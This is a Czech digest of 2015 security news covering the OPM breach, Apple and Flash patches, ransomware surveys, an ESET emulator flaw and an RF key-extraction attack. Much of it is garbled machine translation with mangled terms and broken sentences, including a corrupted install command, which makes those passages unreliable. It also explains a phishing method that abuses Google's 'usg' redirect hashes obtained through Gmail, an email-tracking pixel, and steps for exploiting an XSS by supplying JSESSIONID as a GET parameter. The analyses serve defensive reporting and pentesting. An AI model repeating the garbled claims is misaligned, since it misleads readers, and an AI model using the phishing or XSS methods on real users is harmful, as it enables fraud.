Nechybí ani výpis z trestního rejstříku, informace o minulých zaměstnavatelích a další citlivá data. Některé záznamy navíc obsahovaly již zmíněné otisky prstů. Jak však uvedlo OPM, z provedeného vyšetřování vyplývá, že ty nejcitlivější údaje o finanční situaci pracovníků či jejich zdravotním stavu nebyly ukradeny.

„Nenalezli jsme žádný důkaz o tom, že by při útoku hackerů byly postiženy systémy, na nichž jsou uloženy informace týkající se zdraví, financí či penzijních plánů federálních zaměstnanců,“ uvedlo OPM s tím, že v současné době probíhá „upgrade“ jeho bezpečnostních systémů.

Informace o krádeži údajů více než dvaceti milionů federálních zaměstnancích přicházejí jen několik měsíců poté, co OPM oznámilo jiný průnik do svých systémů, v rámci kterého byla ukradena data o 4,2 milionech současných i bývalých federálních zaměstnancích. Někteří američtí zákonodárci začali po zveřejnění tohoto útoku volat po tom, aby byly citlivé údaje začaly být ukládány na serverech Ministerstva obrany.


Důvěra v antivirové klesá na historické minimum
2.7.2015 Hrozby
Zatímco zájem o riziko koncového uživatele přetrvává, důvěra slábne v tradičních bezpečnostních řešení detekce na bázi, jako jsou antivirové a firewallů. Místo toho, zájem se přesouvá směrem k řešení bezpečnostních prevence založené, jako je například izolace endpoint hrozeb, podle nové zprávy bromem.

Menší důvěra v detekčních řešení dědictví - Drtivá většina respondentů (92 procent) uvedla, že ztratili důvěru ve schopnost tradičních řešení pro ochranu koncových bodů, jako jsou antivirové a bílou seznam, odhalit neznámé hrozby, jako zero-day útoků. Navíc, 78 procent věří, antivirus není účinný proti obecné kybernetickými útoky. izolace Endpoint hrozba je nejvíce efektivní - Pokud vyzváni k výběru ze seznamu bezpečnostních řešení, odborníci bezpečnostní informační uvedlo, že zváží izolace Endpoint hrozba nejvíce efektivní řešení při předcházení kybernetickým hrozbám ( 58 procent). Téměř jedna třetina řekl řešení založené na síti jsou efektivní; 28 procent má víru v narušení prevenci odhalování / narušení (IDS / IPS); a 27 procent si, že síťové karantény jsou účinné. koncoví uživatelé zdrojem největšího rizika - téměř dvě třetiny respondentů (62 procent) se domnívá, že uživatelé jsou jedním z největších zdrojů bezpečnostní riziko. Navíc, více než jedna čtvrtina citovaný nastupujících cloudových a mobilních technologií, které snižují řídit IT; 29 procent citoval cloud služeb; a 29 procent uvedlo, mobilních zařízení mezi top zdrojů rizika. Prevence je základem bezpečnosti - většina respondentů (58 procent) se domnívá, že prevence, jako je kalení a izolačních systémů, je nejvíce foundational aspekt bezpečnostní architektury, ve srovnání s 23 procent, který citoval detekce, o 16 procent, který citoval odpověď (šetření / sanace), a 34 procent, který řekl, Predictive Analytics.


Jak Malware Kampaně Zaměstnávat Google přesměrování a Analytics

1.7.2015 Viry
E-mailová zpráva odeslána do pracovníkem banky tvrdily, že odesílatel obdržel bankovním převodem od organizace příjemce a že odesílatel chtěl potvrdit, že platba prošel bez problémů. Oběť byla vyzývají, aby klikněte na odkaz, že mnoho lidí by se uvažovat o bezpečí, z části proto, že začal s "https://www.google.com/". Jak byste zkoumat povahu tohoto e-mailu?

Zkoumání MSG a EML soubory na Linuxu
Jeden způsob, jak analyzovat podezřelé zprávu uložit jako Outlook soubor MSG, je začít s MSGConvert nástrojem podle Matijs van Zuijlen. Tento nástroj lze převést MSG soubory do více otevřeného vícedílné MIME formátovaný EML soubory, jehož struktura je definována RFC 822 . MSGConvert funguje na Linuxu. Pokud používáte nedávno aktualizovaný REMnux systém, MSGConvert je již nainstalován a můžete jej vyvolat pomocí příkazu "msgconvert". Pokud používáte jiný distro, můžete nainstalovat nástroj pomocí příkazu "CPAN -i EMAILEM :: Outlook :: Message".

Jakmile MSGConvert vytváří EML soubor, můžete zkoumat některé jeho aspekty pomocí textového editoru, i když tento přístup nebude poskytovat vás s viditelností do některými aspekty obsahu souboru. Lepší alternativou je použití emldump.py utilitu Didier Stevens, který může zpochybnit EML souboru do dílčích komponent a extrahovat obsah, jako je tato:

Ve výše uvedeném příkladu, s odvoláním emldump.py bez parametrů ukázal strukturu .eml souboru. Parametr "-d" v režii nástroje vypsat položku, která byla určená pomocí parametru "-s".

Podezřelé e-mailové zprávy zahrnuty prostý text a RTF formátovaný komponenty s odpovídající obsah. To je typické pro mnoho zpráv odeslaných dnes: e-mailový klient odesílatele používá RTF reprezentovat formátování a také připojí textovou verzi zprávy pro e-mailového klienta, který nemůže zobrazit obsah RTF.

V případě e-mailové zprávy popsané zde, není jasné, zda to bylo používáno jako součást masové měřítku nebo cíleného útoku, což je jeden z důvodů, proč jsem to zobrazí jeho obsah sem. Nicméně, zpráva připomínala styl poznámky zveřejněné na jednom veřejném fóru , který vypadal takto:

. "Nedávno jsem dostal BPAY přenosu od vás musím ověřit, je-li správně odesláno Tento kontakt byl ve info příjemce transakce Zde je úplné podrobnosti o platbě:.."

Automatické přesměrování pomocí Google
Škodlivý odkaz vložený do e-mailové zprávy byla navržena, aby oběť věří, že cíl URL byl umístěn na google.com, a byla tudíž, trezor. Ve skutečnosti, odkaz byl navržen tak, aby přesměrovat do ZIP souboru umístěn na Dropbox. Adresa URL byla pečlivě strukturován tak, aby využívat automatické přesměrování schopnost google.com. Začalo to takhle:

https:? //www.google.com/url q = https% 3A% 2F% 2Fwww.dropbox.com ...

Nicméně, jednoduchá forma této adresy URL by byla nedostatečná pro spuštění automatického přesměrování. Místo toho, Google by představil oběť s následující zprávou:

Tak, že oběť se nesetkalo toto oznámení, útočník přidal "USG =" parametr ke škodlivému URL. Ačkoli podrobnosti tohoto parametru na Google vyhledávací URL jsou dokumentovány, zdá se, že obsahuje hash nebo kontrolní součet URL zadané v "Q =" parametr. Je-li "USG =" chybí nebo je jeho obsah neodpovídá URL v dotazu, pak Google není automaticky přesměrovat a představuje oznámení výše. Správné hodnoty dodány v rámci tohoto parametru způsobí google.com se automaticky přesměruje na zadanou adresu URL. Google používá tento mechanismus, jak nasměrovat návštěvníky na jejich požadované místo určení, když klepnete na odkaz na stránce s výsledky vyhledávání.

Nikdo mimo Google Zdá se, že znát algoritmus pro výpočet "USG =" obsah. Chcete-li odvodit správnou hodnotu, musí útočník musel čekat na Google na obsah indexu jeho nebo její Dropbox, takže servery Google precomputed hash / kontrolní součet. Nicméně, protivníci mohou dostat Google rychle vypočítat "USG" hash. Například, zlosyn můžete e-mailem na požadovanou cílovou adresu URL pro jeho / její vlastní účet Gmail, a potom přístup ke službě Gmail pomocí základní zobrazení HTML . Z nějakého důvodu, při přístupu tímto způsobem, Gmail konvertuje URL vložené do e-mailu na Google-přesměrované formulář, který zahrnuje řádné "USG" hash.

Vyzbrojeni správné "USG" hash, útočník by měl vědět, jak k řemeslu URL, které automaticky přesměrováni na victim.The potenciál využití "USG =" pro automatické škodlivých přesměrování je znám již několik let , ačkoli v té době to bylo Není jasné, jak útočníci mohli rychle získat "USG" hodnoty hash.

Google si je vědoma potenciálu pro využití svého vyhledávače k přesměrování a nepovažuje to zranitelnost . Pozice Googlu je, že URL "nejsou spolehlivým ukazatelem bezpečnosti, a může být manipulováno s mnoha způsoby, takže jsme se investovat do technologií pro detekci a upozorňuje uživatele o phishing a zneužívání, ale obecně si myslí, že malý počet správně sledovaných přesměrovačů Nabízí poměrně jasné výhody a představuje velmi malý praktický riziko. "

Jak je diskutováno v tomto deníku událost ukazuje, protivníci zaměstnávat google.com pro přesměrování nicméně, zřejmě s určitým úspěchem. Navíc, schopnost Gmail poskytovat útočníkům s jednoduchým způsobem pro výpočet "USG" hashe oslabuje záruky, které Google postavil na obranu proti zneužívání jeho funkce přesměrování. (Hlášeny jsem Gmail-související scénář společnosti Google, takže společnost může posoudit potenciál pro jeho zneužití.)

Jak tohoto psaní, je to již není možné stáhnout škodlivý zip soubor popsanou v e-mailu výše, protože Dropbox prezentuje následující zpráva:

Chyba (429) Tento účet je veřejné odkazy generují příliš velký provoz a byly dočasně zakázáno!

Sledování e-mailu pomocí služby Google Analytics
Škodlivý Zpráva obsahovala vložený 1-pixel obraz, který byl navržen tak, aby sledovat, zda, kdy a kde příjemce otevřel zprávu. Tento web chyba byla spojena s Google Analytics účtu útočníka. K dosažení tohoto cíle, vložený HTML kód začal takto:

img src = "http:? //www.google-analytics.com/collect v = 1 & tid = ...

"Tid =" parametr obsahoval odesílatele Google Analytics nesleduje ID. "Cid =" parametr identifikovat příjemce zprávy pomocí e-mailovou adresu osoby. Jako výsledek, věnované Analytics předpokladu, obrácenou poznatků nezbytné sledovat účinnost a kontext počátečním útoku vektoru.

V tomto incidentu, útočník byl pomocí hlavního proudu nástrojů dodat nebezpečný náklad a dávat pozor na celkovém kampani s pomocí přesměrování vyhledávač Google je, Google Analytics a Dropbox. Tyto nástroje poskytují protivníky s výkonnými a škálovatelné schopnosti na přijatelnou cenu nula dolarů.


Apple "Patch Tuesday"

1.7.2015 Zranitelnosti
Včera Apple uvolnil záplaty pro OS X, iOS, Safari, Mac EFI, iTunes a Quicktime (Windows) [1]. Zde některé z vrcholů:

EFI aktualizace
"EFI" je firmware spuštěním Mac. Tato aktualizace bude platit pouze u některých modelů počítačů Apple. Dvě chyby, které jsou opravené tímto updata:

CVE-2015-3692: Tato problematika by mohla umožnit útočníkovi změnit EFI firmware, získání trvalé přístup do systému. Chyba byla zveřejněna asi před dvěma měsíci a základní otázkou bylo, že firmware není řádně uzamčen jako systém vrátí z režimu spánku [2].

CVE-2015-3693: Výzkumníci společnosti Intel a Carnegie Mellon University původně objevil tento problém, av březnu, projekt Google nula zveřejnil podrobnosti o pracovní využít pro "rowhammer" zranitelnost [3] [4]. Tento problém není specifický pro Apple, ale účinky mnoho systémů využívajících moderní DRAM paměti. Stručně řečeno, opakovaně písemně některých oblastech paměti, sousední řady paměti může být prováděna umožňující útočníkovi manipulovat kód, že by neměl přístup k jinak.

OS X aktualizace
Tato aktualizace se týká verzí OS X Mountain Lion zpět na (10,8). Celkem 46 otázek, jsou adresy (a ještě více individuální zranitelnosti). Takže tady jen některé zdůrazňuje:

Open Source Software: OS X obsahuje mnoho standardních softwarové produkty open source, jako Apache a knihoven, jako je OpenSSL. Tyto open source produkty jsou aktualizace.

SSL: řada změn byly provedeny na SSL. Například některé meziprodukty certifikáty problémy podle CNNIC již nejsou důvěryhodné. Zajímavé je, CNNIC CA sám ještě zdá být důvěryhodný (jiní, jako je Google, odstraní CNNIC úplně). Apple neposkytuje seznam nových certifikátů přidaných, ale pouze odkazuje na jeho kompletní seznam důvěryhodných certifikátů [5]. I nadále můžete manuálně "nedůvěra" certifikát úpravou důvěru v Keychain Access. V reakci na mrtvého bodu zranitelnosti, parametry Diffie-Hellman jsou nyní omezena na 768 bitů nebo větší (před tím, 512 bit bylo možné). To je v souladu s tím, co jiné operační systémy zavedly v reakci. Tam je malá šance, že to bude způsobovat problémy s připojením do starších serverů.

EFI Související: řešit problémy v této aktualizaci EFI, jsou také zabývá tím, aktualizace OS X..

Mail: e-mailové zprávy byl schopen načíst webové stránky, které pak by mohly být použity na různé útoky typu phishing, například tím, že zobrazuje dialogové okno, pop-up hesla, která vypadá, že přijde ze Mail.app. Tento problém byl již zveřejněn začátkem června [6]

iOS
Vzhledem k celkovému podobné kódové základny mezi iOS a OS X, mnohé z otázek, na OS X platí pro iOS stejně. Například otázky TLS, stejně jako otázka Mail vliv na iOS a jsou záplatované s touto aktualizací. Na zajímavé téma, které jsem neslyšel o dříve (ale ne překvapivé). Škodlivé SIM karty může vést ke spuštění kódu.

Safari
Jako obvykle, Safari je k dispozici, protože vlastní aktualizace. Pouze 4 různé otázky zde od otázek příčných původu ke vzdálenému spuštění kódu.

iTunes / QuickTime
Tyto aktualizace ovlivňují systém Windows (verze OS X je vrácena do OS X náplasti). Neexistuje žádný oficiální QuickTime verze pro Windows než Windows 7. Ale pokud používáte verzi systému Windows 7 na Windows 8 / 8.1, bude pravděpodobně nadále třeba aktualizovat.

[1] https://support.apple.com/en-us/HT201222
[2]
http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
[4] http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain .html
[5] https://support.apple.com/en-us/HT202858
[6] https://github.com/jansoucek/iOS-Mail.app-inject-kit/tree/master


APPLE PATCHES DESÍTKY CHYBY V IOS 8.4, OS X 10.10.4

1.7.2015 Zranitelnosti

Apple vydal nové verze iOS a OS X, z nichž oba obsahují značné množství bezpečnostních záplat, několik chyb, které mohou vést ke vzdálenému spuštění kódu a dalších závažných otázkách. Verze 8.4 iOS obsahuje opravy pro více než 30 bezpečnostních chyb, včetně chyb v jádře WebKit, iOS, a CoreText. Apple také oprava zranitelnost, která vede k útoku mrtvého bodu , problém s servery, které podporují slabý Diffie-Hellman šifrování. Chcete-li opravit tento problém v systému iOS, Apple vydala opravu pro součást coreTLS operačního systému. "CoreTLS přijal krátkých prchavé Diffie-Hellman (DH) klíče, jak je používán v export-pevnostních efemérní CZT kódové soupravy. Tato otázka, také známý jako logjam, nechá útočníka s výsadní postavení sítě downgrade zabezpečení 512-bit DH případě, že server podporován export-sílu efemérní DH šifrovací sada. Problém byl řešen zvýšením výchozí minimální povolenou velikost pro DH jepičí klíče 768 bitů, "Apple poradní říká. Apple také oprava zajímavou chybu, která zahrnovala způsob, jakým iOS zpracovává náklad ze SIM karet. Tato chyba zabezpečení by mohla útočníkovi umožnit vytvořit nebezpečný SIM kartu, která mu mohla dát spuštění kódu na cílové zařízení. Mezi další zranitelná místa oslovených v iOS 8,4ar řada WebKit chyb, z nichž některé by mohly vést ke spuštění kódu. Poprava kód chyby patří dvojici korupce paměť zranitelností v WebKit, a problém s tím, jak rámec manipulováno některé funkce SQL. "Nedostatečná srovnání problém existuje v SQLite authorizer která umožnila vyvolání libovolných SQL funkcí. Tento problém byl vyřešen s lepšími kontrolami autorizace, "říká poradní Apple. Tam je náplast v nové verzi iOS na chyby, které by mohly vést k útočníkovi být schopný nahradit legitimní aplikace s nebezpečným jedna za určitých podmínek. Zranitelnost je ve způsobu, jakým operační systém zpracovává univerzální profily opravných položek, a mohou být použity k nahrazení systémových aplikací, jako je například Apple zaplatit. Výzkumníci z FireEye objevil zranitelnost a hlášeny ho Apple téměř před rokem. "Manifest Masque útok využívá CVE-2015-3722 / 3725 zranitelnost zbourat existující aplikace na iOS, kdy oběť instaluje aplikaci in-house iOS bezdrátově pomocí Enterprise provisioning z webové stránky. Zbořen app (cílová útok) může být buď pravidelné aplikace stáhnout z oficiálních App Store nebo dokonce důležitých systémových aplikací, jako je například Apple Watch, Apple Pay, App Store, Safari, Nastavení, atd Tato chyba zabezpečení ovlivňuje všechny iOS 7. x a iOS 8.x verze předcházející iOS 8.4. Poprvé jsme upozorněni Apple této chyby zabezpečení v srpnu 2014 "vědci FireEye je napsal v vysvětlení o chyby a jeho důsledky. Stejně jako pro OS X, Apple záplatovaný mnoho stejných chyb, které byly přítomny v iOS, spolu s desítkami dalších, celkem více než 75 chyb ve všech. OS X 10.10.4 obsahuje záplaty pro několik buffer overflow zranitelností v Intel grafický ovladač, z nichž některé by mohly vést ke spuštění kódu. Apple opraveny také řadu korupčních paměť chyb v QuickTime, které by mohly být použity pro spuštění kódu. V obou iOS a OS X Apple aktualizoval důvěryhodnosti politiky certifikátu řešit problém certifikátu CNNIC , mimo jiné problémy.

See more at: Apple Patches Dozens of Flaws in iOS 8.4, OS X 10.10.4 https://wp.me/p3AjUX-txp


Vyděračský malware? Častější, než si myslíte

30.6.2015 Viry
Pro 84 procent firem by mohlo být zničující, pokud by se jejich infrastruktury dostal vyděračský malware. A třetina by prý nakonec musela výpalné i zaplatit.

Víc než třetina firem má podle průzkumu, který udělala v rámci evropské konference Infosecurity firma Eset, vlastní zkušenosti se zašifrovanými daty a následným požadavkem na výpalné, nebo jejich manažeři bezprostředně znají firmu, která takové zkušenosti má.

“Ukazuje se, že vyděračský malware je v praxi až překvapivě rozšířený,” komentuje Mark James, bezpečnostní specialista společnosti Esetu.

Respondenti považují vyděračský malware za reálné nebezpečí. 84 procent jich souhlasilo s tezí, že jejich firma by případným úspěšným útokem ransomware utrpěla „vážné škody“. 31 procent respondentů se dokonce přihlásilo ke konstatování, že „zaplatit výpalné by byla jediná možnost, jak nepřijít o zašifrovaná data“.

„Ransomware je jedním z nejnebezpečnějších typů malware, protože má opravdu velký destruktivní potenciál. Průzkum ukázal, že experti na IT bezpečnost často nejsou na tento typ hrozby připraveni.Podíl těch, kdo by byli ochotni platit výpalné, je přitom znepokojivě vysoký. Znamená totiž, že je vysoký podíl firem, které nevěří, že jejich data jsou dobře zálohovaná a dostupná pro obnovu,“ dodává James.

Obranou proti vyděračskému šifrovacímu malware je jednak prevence samotného útoku, tedy obezřetnost uživatelů a používání kvalitního bezpečnostního řešení, a také prevence následků případné úspěšné infiltrace systémů. Ta spočívá v implementaci řešení pro zálohování a obnovu.

„Důležité je, aby firma průběžně testovala svou schopnost data skutečně obnovit. To je totiž důležité i z mnoha dalších důvodů, než jen kvůli odolnosti vůči vyděračům,“ uvádí James.


Facebook pomáhá bojovat proti XARA útokům na Apple

29.6.2015 Počítačový útok

Apple stále pracuje na opravách chyb, které využívají XARA útoky popsané v našem posledním dílu SecUpdate. Z průběhu prací není moc informací a stejně tak je tomu ohledně termínu vydání opravy, který zatím nebyl stanoven.

Je proto dobrou zprávou, že přišla pomoc ze strany Facebooku a to v podobě nových rozšíření frameworku osquery. Jedná se o monitorovací nástroj, který jistým způsobem přemění operační systém v relační databázi. Umožňuje tedy psát SQL-like dotazy nad daty operačního systému. Jednotlivé tabulky obsahují například běžící procesy, načtené moduly jádra, otevřená síťová spojení, doplňky prohlížeče, hardwarové události a podobně.

Nově byly do osquery přidány tři tabulky, které poskytují data k rozpoznání XARA útoků:

“keychain_acls” - pomůže proti krádežím hesel, díky sledování veškerých změn v ACL vztahujících se k položkám v keychainu
“sandboxes” - sleduje změny sandboxů, ze kterých může uživatel vyčíst, že útočná aplikace získává data jiných aplikací pouhým použitím jejich identifikátoru (BID)
"app_schemes" - tabulka obsahuje registrovaná schémata na daném zařízení a aplikace, které si je registrovali, což pomůže uživateli zjistit, zda útočná aplikace nepředběhla v registraci schématu jinou, která ho běžně používá
Pokud se zajímáte o to, co se ve vašem Apple systému děje, neváhejte k vašemu bádání osquery použít. Nástroj je volně dostupný na GitHubu.


Adobe opravuje zero-day chybu ve webovém pluginu Flash Player

29.6.2015 Zranitelnosti

Výzkumníci z FireEye analyzovali útoky hackerské skupiny APT3 na společnosti působící v telekomunikačním, leteckém i obranném průmyslu. Odhalili tak kritickou zranitelnost ve Flash Playeru (CVE-2015-3113), která byla při těchto útocích využívána. Útočníkům dobře posloužila při průniku do systémů Windows 7 a starších, na kterých byl používán Internet Explorer a také u obětí používajících Firefox na systému Windows XP.

Podle blogu FireEye obdrželi oběti email s odkazem na útočný web. Pokud na něj vstoupili, došlo ke spuštění kódu v JavaScriptu, který sloužil k profilování oběti. Pokud byla oběť rozpoznána jako zajímavá, došlo ke stažení škodlivých SWF a FLV souborů, které sloužily k nasazení backdooru známého pod názvem SHOTPUT.

Jak to přesně fungovalo? Exploit zneužil zranitelnost ve Flashi k obejití obrané techniky ASLR (Address Space Layout Randomization) a pomocí return-oriented-programing překonal i DEP (Data Execution Prevention). Shellkód byl zabalen v souboru pro Adobe Flash Player spolu s klíčem pro jeho dešifrování. Jeho úkolem bylo najít samotná data, která měl nasadit na počítač oběti. Ta byla zaxorovaná a skrytá v obrázku.

Záplata již byla vydána, takže doporučujeme co nejdříve aktualizovat  Adobe Flash Player na verzi 18.0.0.194.


FBI počítá oběti Cryptowallu - od dubna 2014 zaplatili přes 18 miliónů dolarů

29.6.2015 Kriminalita

Cryptowall je považován za jeden z nejrozšířenějších ransomwarů, tedy virů, které na počítači oběti zašifrují uživatelské soubory a následně vyžadují výkupné výměnou za klíč k jejich dešifrování.

FBI se setkává s hlášením útoků Cryptowallu od dubna 2014, přičemž do června 2015 obdržela 992 stížností, které se k němu vztahují. Jeho oběti hlásí celkové ztráty, které převyšují 18 miliónů dolarů. Tato částka není tvořena jen zaplaceným výkupným, které se obvykle pohybuje od 200 do 10 000 dolarů, ale také součtem nákladů na přidružené IT služby, protiopatření, ušlé zisky a podobně.

Cryptowall na své oběti nejčastěji číhá na útočných webových stránkách, v infikovaných reklamách, emailech, nebo jejich přílohách. Co se týká platby, k té jsou ve většině případů používány Bitcoiny. Kriminálníci tuto decentralizovanou měnu rádi využívají díky jednoduchému použití a jisté míře anonymity, kterou nabízí.

FBI proto radí, jak se vyhnout ransomwaru. Doporučují používání aktuálních antivirových programů a firewallu, využívání doplňků pro blokování pop-up oken, pečlivé zálohování svých dat a jistá míra nedůvěřivosti, zejména před otvíráním emailových příloh.


Zranitelnost v antiviru ESET

29.6.2015 Zranitelnosti

Většina antivirových řešení obsahuje nástroj pro emulaci, který se používá pro testování spustitelného kódu při hledání virů. Ke spuštění emulace v antivirovém programu dochází automaticky v podstatě na každém kroku uživatele - když surfuje po internetu, obdrží email, stahuje sdílené soubory, připojí USB zařízení a v mnoha dalších případech. A při emulaci pracuje antivirus se zcela neznámými a nedůvěryhodnými daty. Proto by emulátor měl být robustní a izolovaný nástroj.

Jak ale ukázal článek na blogu Google Project Zero, u antivirových produktů společnosti ESET tomu tak není. Útočník dokáže emulátor jednoduše obejít a spustit v průběhu skenování libovolný kód a to se systémovým oprávněním. Následně si tedy může dělat prakticky cokoli - číst, upravovat a mazat všechny soubory na disku, přistupovat k hardwaru jako je mikrofon a webkamera, sledovat veškerou internetovou komunikaci či zaznamenávat stisknuté klávesy.

Uživatel navštívil škodlivou stránku, zatímco měl nainstalovaný ESET NOD32, čímž dal útočníkovi možnost spustit jako root libovolné příkazy.

Problém se nachází ve všech produktech ESET (namátkou Smart Security, NOD32…) a to ve verzích pro všechny platformy, tedy Windows, Mac i Linux. Problém nezáleží na nějakém konkrétním nastavení, chyba je zneužitelná i v defaultním nastavení programů.

ESET na problém okamžitě zareagoval a zranitelnost opravil. Pohlídejte si tedy, abyste měli nainstalovanou aktualizaci, kterou vydali 22. června.


Ukážeme vám, že šifrování dat může být zbytečné, když jste v blízkosti rádia

29.6.2015 Hrozby

Každý týden se setkáváme s útoky na počítače uživatelů, které jsou si často dost podobné. Tentokrát tu máme originální přístup výzkumníků z Univerzity v Tel Avivu. Ti zveřejnili článek [PDF] popisující takzvaný side-channel útok, při kterém jsou schopní na základě analýzy magnetického pole vyzařovaného běžným notebookem extrahovat dešifrovací klíč pro algoritmy RSA a ElGamal. K útoku je možné použít běžný rádiový přijímač, nebo softwarový rádiový přijímač do USB s jednoduchou anténou.


Softwarový rádiový přijímač s anténou a malým počítačem Rikomagic, který odesílá nasbíraná data po Wifi. To vše včetně antény je možné vtěsnat do pita chlebu.

Na webu útoku uvádějí, že se jim podařilo během několika sekund úspěšně extrahovat klíče z různých typů notebooků, na kterých běželo GnuPG. Vzdálenost přijímače od cílového notebooku byla 50 centimetrů. Vzhledem k velikosti přijímače by nebyl problém ho ukrýt například do peněženky nebo do pita chlebu, jak udávají na webu.

Při útoku je na cílový notebook odesláno několik specifických zašifrovaných textů. Při jejich dešifrování dochází k výskytu specificky strukturovaných hodnot v dešifrovacím programu a ty způsobují měřitelné výkyvy v elektromagnetickém poli notebooku. Výzkumníkům se podařilo odvodit závislost mezi těmito výkyvy a jednotlivými bity klíče. Pomocí zpracování a kryptoanalýzy těchto odchylek je tedy možné klíč určit.

Myslete na tento útok, až budete příště na svém notebooku dešifrovat data v blízkosti rádia nebo třeba chleba.


K zachycení signálu stačí i běžné rádio, které je v tomto případě připojené do audio konektoru telefonu HTC EVO 4G, ve kterém se signál nahrává.


Web bezpečnostní jemnosti a využívání kombinovaných zranitelnosti

29.6.2015 Zranitelnosti
Cílem testu penetrační je hlásit veškeré zjištěné zranitelnosti k zákazníkovi. Samozřejmě, každý penetrace Tester staví většinu svého úsilí na nalezení kritické bezpečnostní chyby: SQL injection, XSS a podobné, které mají největší vliv na testované webové aplikace (a, opravdu, to nebolí penetraci testeru ego, když takový zranitelnost je identifikována :)

Nicméně, já silně tlačit směrem k vykazování každého jednotlivého zranitelnosti, bez ohledu na to, jak by se mohlo zdát neškodná (a moji spolupracovníci penetrace tým někdy stěžují na to, ale pojďme ukázat jim špatně).

Zde se podíváme na to, jak může být dvě zdánlivě nízké rizikových zranitelností sloučeny do více nebezpečný.

Přijímání parametry GET a POST žádosti

Při zpracování parametry / odpovědi přijaté od klienta, většina z dnešních webových aplikací spoléhají na požadavky HTTP POST. To je preferovaný způsob posílání klienta souvisejících s vstup / výstup z prohlížeče, protože to nebude viditelný v (nebo proxy je) logů webového serveru. Jedním z testů jsem normálně udělat, je zkontrolovat, zda aplikace akceptuje stejné parametry v GET HTTP požadavků. Pojďme se podívat na to.

"Oficiální" Požadavek vypadá takto:

POST / stránku HTTP / 1.1
Host: my.example.local
... (další hlavičky)

parametr = hodnota & tajemství = secret_value

Nyní se můžeme pokusit vydat stejnou žádost jako všeobecní žádost GET HTTP:

? GET / strana parametr = hodnota & tajemství = secret_value HTTP / 1.1
Host: my.example.local
... (další hlavičky)

Pokud to fungovalo to znamená, že testovaný webová aplikace (testováno stránky / script) přijímá parametry z jakékoliv přání. I když toto samo o sobě není opravdu chyba zabezpečení, není to perfektní způsob, jak pro příjem a zpracování parametrů, jak uvidíme dále. Navíc, mějte na paměti, že toto dělá práci útočníka trochu jednodušší - místo práce s žádostí HTTP POST se může jednoduše dát vše do GET HTTP požadavku (jo, to funguje u obránců, jak dobře, protože uvidíme, co se dal do požadavek).

Zdánlivě neškodné XSS zranitelnost

Zatímco další testování této aplikace jsme našli XSS zranitelnost. Pro jednoduchost řekněme, že je to anonymní aplikace, která nemá žádné přihlašovací formuláře. Nicméně, protože aplikace, závisí na určitém pracovním postupu, a od té doby bylo zjištěno, XSS ve 3. kroku pracovního postupu, to vyžaduje platný cookie (JSESSIONID cookie).

Co to znamená? To znamená, že útočník nemůže využít XSS zranitelnost: v případě, že požadavek na zranitelné stránky je vyroben bez platného JSESSIONID cookie, aplikace jednoduše přesměruje uživatele na přední straně (první krok workflow). I v případě, že oběť nyní znovu klikli na odkaz škodlivý, to ještě nebude fungovat, protože testované aplikace kontroluje pracovního postupu fáze / krok, a pokud to není zase opravit pouze přesměruje uživatele na přední straně.

Ach, jako zklamání po zjištění velmi pěkný XSS zranitelnost: útočník může skutečně využívat pouze sám sebe, a to je to vůbec žádná legrace. Nebo je tam jiný způsob?

Vezmeme to kousek dál

Vzpomeňte si, jak jsme přišli na to, že žádost přijímá parametry jak GET a žádosti POST HTTP výše?
Uvidíme, co jiného může být podána prostřednictvím těchto žádostí. Cookie, který má zásadní význam pro chování testované aplikace je jednoduchý JSESSIONID cookie, který vypadá takto:

Cookie: JSESSIONID = 560308266F93351159D8D20732C637FA

Vzhledem k tomu, cookie se běžně posílá jako součást hlavičky, může útočník nedostane prohlížeč oběti nastavit cookie pro cílovou webovou aplikaci, alespoň ne bez využití další chyby - jako je XSS zranitelnost - ale nezapomeňte, že nemůžeme využít ji bez platné cookie. Catch 22 není to?

Ale, ať to není ztrácet naději. Co když se snažíme podat cookie jako parametr GET nebo požadavku POST HTTP? Taková žádost by vypadat takto:

GET / stránku JSESSIONID = 560308266F93351159D8D20732C637FA¶meter = hodnota & tajemství = secret_value HTTP / 1.1?
Host: my.example.local
... (další hlavičky)

Bingo! To fungovalo - testovaný webová aplikace šťastně vzali a analyzovat všechny předložené parametry, dokonce i parametr JSESSIONID která by měla být za normálních okolností dodáván jako cookie. Vývojáři pravděpodobně chtěl být tak flexibilní, jak je to možné.

Kombinací zranitelnosti do exploit

Takže, útočník může nyní nasadit následující útok:

Vytvoření nové relace, kde se přejde na požadovanou obrazovku. Aplikace nyní "ví", že cookie JSESSIONID, která byla dána k útočníkovi vztahuje k relaci, která je na zranitelné obrazovku.
Vytvořit škodlivý adresu URL, která zneužívá XSS zranitelnost. Připojit parametr JSESSIONID, který obsahuje cookie hodnotu útočníka do škodlivého URL. Tato adresa URL bude fungovat, protože zranitelné webová aplikace bude ověřovat stav relace a uvidíte, že uživatel je přístup k platné obrazovku v pracovním postupu.
Pošlete škodlivý URL k oběti, počkejte a zisk.
Konečně, poslední věc k diskusi, je možná to, co jsme využít s zranitelnosti XSS na prvním místě: typicky útočník pokusí se ukrást cookie s cílem získat přístup k relaci oběti. Vzhledem k tomu, zde sezení jsou irelevantní, se útočník nepoužívá XSS ukrást cookies, ale místo toho změnit to, co se zobrazí stránka webové oběti. Toho lze využít pro všechny druhy phishing činy a, v závislosti na URL a kontextu útoku, může být ještě ničivější než krást zasedání.


Výchozí pověření Cisco - znovu!

29.6.2015 Zranitelnosti
Cisco dnes vydala informační zpravodaj zabezpečení oznamující, že některé z produktů společnosti Cisco IronPort "Virtual Appliance" obsahovat "více výchozí SSH klíčů". Chcete-li citovat: Chyba zabezpečení v funkčnosti vzdálené podpory Cisco WSAv, Cisco ESAv, a Cisco SMAv softwaru by mohla umožnit neověřenému vzdálenému útočníkovi připojit do postiženého systému s právy uživatele root.
 

Oh, dobrá věc, je to jen "root". Měl jsi mě strach, že na druhou :). Zajímavé je, že byl poněkud podobný Cisco poradní před rokem (na CUCDM), kde byl také přítomen výchozí SSH klíč, a stejně tak vedl k oprávnění uživatele root. Vyhledávání "výchozí pověření" na poradním webových stránkách společnosti Cisco ukazuje, že za posledních několik let, přítomnost backdoor a výchozí uživatele nadále opakující se problém:

